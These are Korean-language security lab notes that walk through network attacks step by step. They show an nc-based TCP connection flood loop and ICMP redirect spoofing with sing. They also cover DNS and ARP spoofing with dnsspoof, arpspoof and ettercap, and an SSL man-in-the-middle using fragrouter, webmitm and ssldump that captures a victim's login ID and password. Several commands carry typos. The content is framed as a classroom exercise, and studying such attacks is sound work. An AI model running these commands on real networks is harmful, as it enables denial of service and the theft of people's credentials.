9월 24일

==================================================================
 TCP Connect flooding DOS

# while [ 1 ]
> do
> nc x.x.x.x or [www.사이트주소] 80 &
> done

==================================================================

# echo 1 > /proc/sys/net/ipv4/ip.forward
# sing -red -S [ spoof ip ] -gw [ GW용 ip ] -dest [ destination ip ]
 -x host -prot tcp -psrc 100 -pdst 90 [ target ip ]

예) sing -red -S 192.168.102.2(실제 g/w 번호를 넣어 속인다.) -gw (자신의 아이피를 넣어 자신이 게이트라고 알린다.)
-dest 72.5.124.61(특정사이트 아이피주소) -x host -prot tcp -psrc 100 0pdst 90 [target ip]

==================================================================

www.ntsecurity.nu

toolbox --> grabitall

네트워크 환경 속성에 들어가서 프로토콜 추가

디스크있음으로 해서 추가

커맨드기반 파일이므로 씨 루트로 옮겨놓는게 편하다

=========================================================

SSL MITM (Man in the Middle)

 level 5

----------- ssl v3

 level 4

=========================================================

attacker

 fragrouter 1.6 -> filewatcher.com

 fragrouter 1.6.tgz 다운 후

 #tar vxfz fragrouter-1.6.tgz
 #cd fragrouter-1.6
 #./configure
 #make
 #make install

 
 ssldump-0.9b3.tar.gz
 #tar vxfz ssldump-0.9b3.tar.gz
 #cd ssldump-0.9b3
 #./configure
 #make
 #make install

========================================================

BackTrack

 1.bison
 2.yacc
 3.flex

 library 를 설치해야된다.

#apt-get install bison
#atp-get install byacc
#atp-get install flex

========================

dnsspoof
arpspoof
webmitm
fragrouter

돌리고

wireshark로 저장

#ssldump -r /dump.pcap -k webmitm.crt | grep [ID]

==================================================
BT 에서

#locate etter.dns
/usr/share/ettercap/etter.dns

#vi /usr/share/ettercap/etter.dns

192.168.102.10 A *.www.dreamiz.com

:wq!

#ettecap -T -q -oP dns_spoof -M arp // //

========================================================
실습상황 : attacker 가 네트워크상의 다른컴퓨터로
spoofing 한후에 특정사이트의 아이디와 비밀번호를 획득
하는 상황
=========================================================
[ attacker ]

■ # vi a.txt

[ 공격자 ip ] [특정사이트]
wq!

ex)
192.168.102.10 www.nate.com
wq!

■ # dnsspoof -f /a.txt

■ # arpspoof [Gateway ip] -t [target ip]
ex)
 # arpspoof 192.168.102.2 -t 192.168.102.30

■ fragrouter -B1

■ # webmitm
이후 인증서 내용에 대한 입력창이 뜬다. 적을껀 적고 안적어도 상관없다.

<ctrl + c> 로 나온후  재실행.

■ # ethereal 실행시켜 패킷을 잡는다.

위 4가지를 실행시켜놓은후 victim 의 환경으로 이동

[ victim ]

커맨드 창을 열어서 사이트 포워딩이 되어있는지 확인

C:\> nslookup
Default Server:  kns.kornet.net
Address:  168.126.63.1

> www.nate.com
Server:  kns.kornet.net
Address:  168.126.63.1

Non-authoritative answer:
Name:    www.nate.com
Address:  192.168.102.10   <-- 바뀐것을 알수 있다.

>

explorer 를 실행시킨후 사이트에 접속. 아이디와 비밀번호를 입력후
보안설정 체크후 로그인을 해본다.

가짜 인증서 화면이 나오게되며 <세부사항> 으로 가짜로 입력한
정보를 확인해본다.

이후 넘어가게되면 attacker 쪽의 ethereal 에 패킷이 잡히게된다

패킷 잡은 파일을 저장한후

아이디와 비밀번호에 관련된 정보를 찾기위해서

■ # ssldump -r dump.pcap -k webmitm.crt -d | grep [ 아이디 ]

하게되면 아이디 있던 부분이 나오게되며 비밀번호도 같이 나오게된다.

====================================================================